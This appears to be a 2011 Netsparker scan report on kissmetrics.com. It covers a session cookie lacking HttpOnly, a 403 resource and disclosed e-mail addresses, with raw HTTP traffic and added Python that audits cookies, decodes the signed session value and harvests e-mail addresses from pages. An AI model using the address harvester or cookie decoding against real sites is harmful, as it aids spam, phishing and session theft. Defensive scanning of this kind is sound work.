ID cookies to enable certain features of the Site, to better understand how you interact with the Site and to monitor aggregate usage by KISSmetrics Users and web traffic routing on the Site. Unlike persistent cookies, session cookies are deleted from your computer when you log off from the Site and Service and then close your browser. Third-party advertisers on the Site may also place or read cookies on your browser. You can instruct your browser, by changing its options, to stop accepting cookies or to prompt you before accepting a cookie from the websites you visit. 
If you do not accept cookies, however, you may not be able to use all portions of the Site or all functionality of the Service.</p> <h3>Phishing</h3> <p>Identity theft and the practice currently known as "phishing" are of great concern to KISSmetrics. Safeguarding information to help protect you from identity theft is a top priority. We do not and will not, at any time, request your credit card information, your account ID, login password, or national identification numbers in a non-secure or unsolicited e-mail or telephone communication. For more information about phishing, visit the Federal Trade Commission’s website.</p> <h3>Information Sharing and Disclosure</h3> <p><i>Aggregate Information and Non-Identifying Information.</i> We may share aggregated information that does not include personally identifiable information and we may otherwise disclose non-identifying Information and Log Data with third parties for industry analysis, demographic profiling and other purposes. Any aggregated information shared in these contexts will not contain your personally identifiable information.</p> <p><i>Service Providers.</i> We may employ third-party companies and individuals to facilitate our Site and Service, to provide the Service on our behalf, to perform Site-related services (e.g., without limitation, maintenance services, database management, web analytics and improvement of the Site’s features) or to assist us in analyzing how our Site and Service are used. These third parties have access to your personally identifiable information only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.</p> <p><i>Compliance with Laws and Law Enforcement.</i> KISSmetrics cooperates with government and law enforcement officials and private parties to enforce and comply with the law. 
We will disclose any information about you to government or law enforcement officials or private parties as we, in our sole discretion, believe necessary or appropriate to respond to claims and legal process (including but not limited to subpoenas), to protect the property and rights of KISSmetrics or a third party, to protect the safety of the public or any person, or to prevent or stop activity we may consider to be, or to pose a risk of being, any illegal, unethical or legally actionable activity. </p> <p><i>Business Transfers.</i> KISSmetrics may sell, transfer or otherwise share some or all of its assets, including your personally identifiable information, in connection with a merger, acquisition, reorganization or sale of assets or in the event of bankruptcy. </p> <h3>Changing or Deleting Your Information</h3> <p>All KISSmetrics Customers may review, update, correct or delete the personally identifiable information in their registration profile by contacting us. If you completely delete all such information, then your account may become deactivated. If you would like us to delete your record in our system, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a> with a request that we delete your personally identifiable information from our database. We will use commercially reasonable efforts to honor your request. We may retain an archived copy of your records as required by law or for legitimate business purposes.</p> <h3>Security</h3> <p>KISSmetrics is very concerned with safeguarding your information. 
We employ administrative, physical and electronic measures designed to protect your information from unauthorized access.</p> <p>We will make any legally required disclosures of any breach of the security, confidentiality, or integrity of your unencrypted electronically stored "personal data" (as defined in applicable state statutes on security breach notification) to you via email or conspicuous posting on this Site in the most expedient time possible and without unreasonable delay, insofar as consistent with (i) the legitimate needs of law enforcement or (ii) any measures necessary to determine the scope of the breach and restore the reasonable integrity of the data system.</p> <h3>International Transfer</h3> <p>Your information may be transferred to — and maintained on — computers located outside of your state, province, country or other governmental jurisdiction where the privacy laws may not be as protective as those in your jurisdiction. If you are located outside the United States and choose to provide information to us, KISSmetrics transfers personally identifiable information to the United States and processes it there. Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.</p> <h3>Links to Other Sites</h3> <p>Our Site contains links to other websites. If you choose to visit a third party website, e.g. an advertiser by "clicking on" a banner ad or other type of advertisement, or click on another third-party link, you will be directed to that third party’s website. The fact that we link to a website or present a banner ad or other type of advertisement is not an endorsement, authorization or representation of our affiliation with that third party, nor is it an endorsement of their privacy or information security policies or practices. We do not exercise control over third-party websites. 
These other websites may place their own cookies or other files on your computer, collect data or solicit personal information from you. Other sites follow different rules regarding the use or disclosure of the personal information you submit to them. We encourage you to read the privacy policies or statements of the other websites you visit.</p> <h3>Our Policy Toward Children</h3> <p>Our Site and Service is not directed to children under 13. We do not knowingly collect personally identifiable information from children under 13. If a parent or guardian becomes aware that his or her child has provided us with personally identifiable information without their consent, he or she should contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>. If we become aware that a child under 13 has provided us with personally identifiable information, we will delete such information from our files.</p> <h3>Aligning Your Privacy Policy With Our Tools</h3> <p>For information on how you can align your KISSmetrics installation with your privacy policy please <a href="http://support.kissmetrics.com/misc/user-privacy">see here</a>.</p> <h3>Contacting Us</h3> <p>If you have any questions about this Privacy Policy, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>.</p></div><!-- /.wrap --> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" 
target="_new" title="Visit the KISSmetrics Marketing Blog">Blog..

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked as HttpOnly. HttpOnly cookies cannot be read by client-side scripts, so marking a cookie as HttpOnly provides an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HttpOnly (after this change, JavaScript code will no longer be able to read them).

Remedy

Mark the cookie as HttpOnly. This is an extra layer of defence against XSS, not a silver bullet: it stops injected script from reading the cookie value, but it does not prevent Cross-site Scripting itself. An attacker can use a tool such as XSS Tunnel to drive the victim's browser and issue requests that the browser sends with the cookie attached, without ever reading it.
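The check and the fix, as an added example in Python (not part of the Netsparker report). It parses the `Set-Cookie` header copied from the response below, lists the protective attributes it lacks (the same logic also flags a missing `Secure` attribute), and rewrites it with the attributes the remedy calls for. `split_signed_cookie` is an observation on the value's own layout, assumed here to be a signed cookie of the kind Rails' CookieStore emits (base64 payload, `--`, 40 hex digits of HMAC-SHA1); the report itself does not say which framework issued it. `RESPONSE_HEADERS` is a constructed copy of the recorded headers.

```python
"""Audit a Set-Cookie header for the protective attributes the finding is about.

Added example, not Netsparker's code. RESPONSE_HEADERS is a constructed copy
of the headers in the HEAD /privacy response recorded in the report. Reading
the cookie value as a signed payload plus HMAC-SHA1 is an assumption about its
layout (it matches Rails' signed CookieStore); the report does not say what
issued it.
"""
import base64
import re
from urllib.parse import unquote

RESPONSE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Server", "nginx"),
    ("Set-Cookie", "sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/"),
]

# Attributes a session cookie should carry; order is only for stable output.
REQUIRED_FLAGS = ("httponly", "secure")

# Canonical spelling when re-emitting attributes.
ATTR_NAMES = {"path": "Path", "domain": "Domain", "expires": "Expires",
              "max-age": "Max-Age", "samesite": "SameSite"}


def parse_set_cookie(header):
    """Split a Set-Cookie value into (name, value, {lower-cased attr: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def missing_flags(header):
    """Protective attributes absent from one Set-Cookie header."""
    _, _, attrs = parse_set_cookie(header)
    return [flag for flag in REQUIRED_FLAGS if flag not in attrs]


def audit(headers):
    """Map each cookie set by the response to the flags it lacks ([] = clean)."""
    report = {}
    for key, val in headers:
        if key.lower() == "set-cookie":
            name, _, _ = parse_set_cookie(val)
            report[name] = missing_flags(val)
    return report


def harden(header):
    """Re-emit the header with Secure, HttpOnly and SameSite=Lax (the remedy)."""
    name, value, attrs = parse_set_cookie(header)
    attrs.pop("secure", None)
    attrs.pop("httponly", None)
    attrs.setdefault("samesite", "Lax")
    rendered = [f"{name}={value}"]
    for key, val in attrs.items():
        label = ATTR_NAMES.get(key, key)
        rendered.append(f"{label}={val}" if val else label)
    rendered += ["Secure", "HttpOnly"]
    return "; ".join(rendered)


def split_signed_cookie(value):
    """Decode a 'base64payload--hexsignature' cookie value.

    Returns (payload_bytes, signature) or None when the value is not shaped
    that way. Assumption: this is the Rails-style signed-cookie layout, in
    which the signature proves integrity but the payload is not encrypted.
    """
    payload_b64, sep, signature = unquote(value).partition("--")
    if not sep or not re.fullmatch(r"[0-9a-f]{40}", signature):
        return None
    return base64.b64decode(payload_b64), signature


if __name__ == "__main__":
    raw = RESPONSE_HEADERS[2][1]
    print("missing:", audit(RESPONSE_HEADERS))
    print("hardened:", harden(raw))
    payload, sig = split_signed_cookie(parse_set_cookie(raw)[1])
    print("payload bytes:", payload.hex(), "signature:", sig)
```

Run against the recorded header, `audit` reports `sid` missing both `httponly` and `secure`. The payload decodes to the four bytes `04 08 7b 00`, a Marshal-serialised empty hash, which fits a scanner sending an unauthenticated HEAD request: for this request there was nothing to steal, but a logged-in user's `sid` carries the session and is readable by any script on the page until the flag is set. `SameSite=Lax` goes beyond the remedy; it did not exist when this scan ran in August 2011 and is added here as a further mitigation.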

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /privacy

/privacy CONFIRMED

https://www.kissmetrics.com/privacy

Identified Cookie

sid

Request

HEAD /privacy HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Accept: netsparker/check
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:10 GMT
Server: nginx
Set-Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/
Vary: Accept-Encoding
Connection: keep-alive


Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /stylesheets/external/

/stylesheets/external/ CONFIRMED

https://www.kissmetrics.com/stylesheets/external/

Request

GET /stylesheets/external/ HTTP/1.1
Referer: https://www.kissmetrics.com/stylesheets/external/shell.css?r=1669
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:24 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 123
Connection: keep-alive


<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be fed to spam engines and to brute-force tools (for example as candidate usernames), and valid addresses also enable social engineering attacks such as targeted phishing.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications, and remove user- or person-specific e-mail addresses from the web site; where a contact channel is required, use a submission form instead.
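The extraction behind this finding, as an added example (not the scanner's code). `SAMPLE_HTML` is a constructed fragment: the `mailto:` link is copied from the /privacy response recorded in the report, while the entity-encoded address and the `mailto:` link with a query string are added to show what a harvester has to normalise; `Sales@Example.com` is a placeholder.

```python
"""Harvest e-mail addresses from an HTML response body.

Added example, not Netsparker's code. SAMPLE_HTML is constructed: the
mailto: link is copied from the /privacy response recorded in the report,
the other addresses are placeholders added to exercise the normalisation.
"""
import html
import re
from urllib.parse import unquote

SAMPLE_HTML = """
<p>please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>.</p>
<p>Support (entity-encoded, constructed): support&#64;kissmetrics.com</p>
<a href="mailto:Sales@Example.com?subject=Hi">placeholder sales link</a>
"""

# Plain-text addresses: local part, '@', dotted domain with an alphabetic TLD.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")
# mailto: targets, stopping before any ?subject=... query string.
MAILTO_RE = re.compile(r"""href\s*=\s*["']mailto:([^"'?]+)""", re.IGNORECASE)


def harvest_emails(page):
    """Return the distinct addresses in `page`, lower-cased and sorted."""
    text = html.unescape(page)  # &#64; and friends become '@' before matching
    found = set()
    for m in MAILTO_RE.finditer(text):
        found.add(unquote(m.group(1)).strip().lower())
    for m in EMAIL_RE.finditer(text):
        found.add(m.group(0).lower())
    return sorted(found)


if __name__ == "__main__":
    for address in harvest_emails(SAMPLE_HTML):
        print(address)
```

Two details matter when reproducing the finding by hand: a matcher that runs over the raw bytes misses the `&#64;` form, and one that does not cut the query string off `mailto:` URLs reports a malformed address. Running the block prints the three addresses, so a page that only exposes a generic `info@` address, or none at all, is what the remedy leaves behind.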

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /privacy

/privacy

https://www.kissmetrics.com/privacy

Found E-mails

  • privacy@kissmetrics.com
  • support@kissmetrics.com

Request

GET /privacy HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.kissmetrics.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:11 GMT
Server: nginx
Set-Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>KISSmetrics Privacy Policy</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" 
id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="wrap"> <h2>KISSmetrics Privacy Policy</h2> <hr /> <p>Space Pencil, Inc., aka KISSmetrics, ("<b>KISSmetrics</b>" or "<b>we</b>" or "<b>our</b>"), makes available a service that enables a website operator to have collected and tracked certain data and information regarding the characteristics and activities of visitors to websites owned or controlled by the website operator or operated by the website operator on behalf of a third party and to view certain analytical reports based on such data and information (the "<b>Service</b>"). A website operator that desires to use the Service must execute a separate online agreement with KISSmetrics (a website operator that executes such an agreement, a "<b>KISSmetrics Customer</b>"). Under such agreement, KISSmetrics grants the KISSmetrics Customer a license to use certain software code that, when installed on a website, collects and track certain data and information regarding the characteristics and activities of visitors to website (collectively, "<b>Website Visitor Data</b>").</p> <p>KISSmetrics provides this Privacy Policy to inform you of our policies and procedures regarding the collection, use and disclosure of personal information that we receive from you. 
This Privacy Policy may be updated from time to time. We will notify you of any material changes by posting the new Privacy Policy on the KISSmetrics website (the "Site"). You are advised to consult this policy regularly for any changes.</p> <p>This Privacy Policy applies only to information that KISSmetrics Customers provide to us during their registration with KISSmetrics as a KISSmetrics Customer and their creation of a KISSmetrics Customer account and in conjunction with their access to and use of the Service. This privacy policy does not apply to any Website Visitor Data that KISSmetrics may collect, obtain or access in connection with operating the Service.</p> <p>As used in this policy, the terms "using" and "processing" information include using cookies on a computer, subjecting the information to statistical or other analysis and using or handling information in any way, including, but not limited to collecting, storing, evaluating, modifying, deleting, using, combining, disclosing and transferring information within our organization or among our affiliates within the United States or internationally.</p> <h3>Information Collection and Use</h3> <p><i>Personally Identifiable Information.</i></p> <ul> <li>When you register with us through the Site, as a KISSmetrics Customer, we will ask you for personally identifiable information. This refers to information about you that can be used to contact or identify you. Personally identifiable information includes, but is not limited to, your name, phone number, credit card or other billing information (if applicable), email address and home and business postal addresses. 
We use your personally identifiable information mainly to provide the Service and administer your inquiries.</li> <li>We also collect other non-identifying information that you provide as part of registration (e.g., without limitation, zip code (on its own) and individual preferences).</li> <li>We use your personally identifiable information (in some cases, in conjunction with your non-identifying Information) mainly to provide the Service, complete your transactions, and administer your inquiries.</li> <li>Certain non-identifying Information would be considered a part of your personally identifiable information if it were combined with other identifiers (for example, combining your zip code with your street address) in a way that enables you to be identified. But the same pieces of information are considered non-identifying Information when they are taken alone or combined only with other non-identifying information (for example, your viewing preferences). We may combine your personally identifiable information with non-identifying Information and aggregate it with information collected from other KISSmetrics Users (defined below) to attempt to provide you with a better experience, to improve the quality and value of the Service and to analyze and understand how our Site and Service are used. We may also use the combined information without aggregating it to serve you specifically, for instance to deliver a product to you according to your preferences or restrictions.</li> <li>We also use your personally identifiable information to contact you with KISSmetrics newsletters, marketing or promotional materials and other information that may be of interest to you. If you decide at any time that you no longer wish to receive such communications from us, please follow the unsubscribe instructions provided in any of the communications or update your "user preferences" information. 
(See "<b>Changing or Deleting Information</b>," below.)</li> </ul> <p><i>Log Data.</i> When you visit the Site, whether as a KISSmetrics Customer or a non-registered user just browsing (any of these, a "<b>KISSmetrics User</b>"), our servers automatically record information that your browser sends whenever you visit a website ("<b>Log Data</b>"). This Log Data may include information such as your computer’s Internet Protocol ("<b>IP</b>") address, browser type or the webpage you were visiting before you came to our Site, pages of our Site that you visit, the time spent on those pages, information you search for on our Site, access times and dates, and other statistics. We use this information to monitor and analyze use of the Site and the Service and for the Site’s technical administration, to increase our Site’s functionality and user-friendliness, and to better tailor it to our visitors’ needs.</p> <h3>Cookies</h3> <p>Like many websites, we use "cookies" to collect information. A cookie is a small data file that we transfer to your computer’s hard disk for record-keeping purposes. We use cookies for two purposes. First, we utilize persistent cookies to save your registration ID and login password for future logins to the Site. Second, we utilize session ID cookies to enable certain features of the Site, to better understand how you interact with the Site and to monitor aggregate usage by KISSmetrics Users and web traffic routing on the Site. Unlike persistent cookies, session cookies are deleted from your computer when you log off from the Site and Service and then close your browser. Third-party advertisers on the Site may also place or read cookies on your browser. You can instruct your browser, by changing its options, to stop accepting cookies or to prompt you before accepting a cookie from the websites you visit. 
If you do not accept cookies, however, you may not be able to use all portions of the Site or all functionality of the Service.</p> <h3>Phishing</h3> <p>Identity theft and the practice currently known as "phishing" are of great concern to KISSmetrics. Safeguarding information to help protect you from identity theft is a top priority. We do not and will not, at any time, request your credit card information, your account ID, login password, or national identification numbers in a non-secure or unsolicited e-mail or telephone communication. For more information about phishing, visit the Federal Trade Commission’s website.</p> <h3>Information Sharing and Disclosure</h3> <p><i>Aggregate Information and Non-Identifying Information.</i> We may share aggregated information that does not include personally identifiable information and we may otherwise disclose non-identifying Information and Log Data with third parties for industry analysis, demographic profiling and other purposes. Any aggregated information shared in these contexts will not contain your personally identifiable information.</p> <p><i>Service Providers.</i> We may employ third-party companies and individuals to facilitate our Site and Service, to provide the Service on our behalf, to perform Site-related services (e.g., without limitation, maintenance services, database management, web analytics and improvement of the Site’s features) or to assist us in analyzing how our Site and Service are used. These third parties have access to your personally identifiable information only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.</p> <p><i>Compliance with Laws and Law Enforcement.</i> KISSmetrics cooperates with government and law enforcement officials and private parties to enforce and comply with the law. 
We will disclose any information about you to government or law enforcement officials or private parties as we, in our sole discretion, believe necessary or appropriate to respond to claims and legal process (including but not limited to subpoenas), to protect the property and rights of KISSmetrics or a third party, to protect the safety of the public or any person, or to prevent or stop activity we may consider to be, or to pose a risk of being, any illegal, unethical or legally actionable activity. </p> <p><i>Business Transfers.</i> KISSmetrics may sell, transfer or otherwise share some or all of its assets, including your personally identifiable information, in connection with a merger, acquisition, reorganization or sale of assets or in the event of bankruptcy. </p> <h3>Changing or Deleting Your Information</h3> <p>All KISSmetrics Customers may review, update, correct or delete the personally identifiable information in their registration profile by contacting us. If you completely delete all such information, then your account may become deactivated. If you would like us to delete your record in our system, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a> with a request that we delete your personally identifiable information from our database. We will use commercially reasonable efforts to honor your request. We may retain an archived copy of your records as required by law or for legitimate business purposes.</p> <h3>Security</h3> <p>KISSmetrics is very concerned with safeguarding your information. 
We employ administrative, physical and electronic measures designed to protect your information from unauthorized access.</p> <p>We will make any legally required disclosures of any breach of the security, confidentiality, or integrity of your unencrypted electronically stored "personal data" (as defined in applicable state statutes on security breach notification) to you via email or conspicuous posting on this Site in the most expedient time possible and without unreasonable delay, insofar as consistent with (i) the legitimate needs of law enforcement or (ii) any measures necessary to determine the scope of the breach and restore the reasonable integrity of the data system.</p> <h3>International Transfer</h3> <p>Your information may be transferred to — and maintained on — computers located outside of your state, province, country or other governmental jurisdiction where the privacy laws may not be as protective as those in your jurisdiction. If you are located outside the United States and choose to provide information to us, KISSmetrics transfers personally identifiable information to the United States and processes it there. Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.</p> <h3>Links to Other Sites</h3> <p>Our Site contains links to other websites. If you choose to visit a third party website, e.g. an advertiser by "clicking on" a banner ad or other type of advertisement, or click on another third-party link, you will be directed to that third party’s website. The fact that we link to a website or present a banner ad or other type of advertisement is not an endorsement, authorization or representation of our affiliation with that third party, nor is it an endorsement of their privacy or information security policies or practices. We do not exercise control over third-party websites. 
These other websites may place their own cookies or other files on your computer, collect data or solicit personal information from you. Other sites follow different rules regarding the use or disclosure of the personal information you submit to them. We encourage you to read the privacy policies or statements of the other websites you visit.</p> <h3>Our Policy Toward Children</h3> <p>Our Site and Service is not directed to children under 13. We do not knowingly collect personally identifiable information from children under 13. If a parent or guardian becomes aware that his or her child has provided us with personally identifiable information without their consent, he or she should contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>. If we become aware that a child under 13 has provided us with personally identifiable information, we will delete such information from our files.</p> <h3>Aligning Your Privacy Policy With Our Tools</h3> <p>For information on how you can align your KISSmetrics installation with your privacy policy please <a href="http://support.kissmetrics.com/misc/user-privacy">see here</a>.</p> <h3>Contacting Us</h3> <p>If you have any questions about this Privacy Policy, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>.</p></div><!-- /.wrap --> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav&..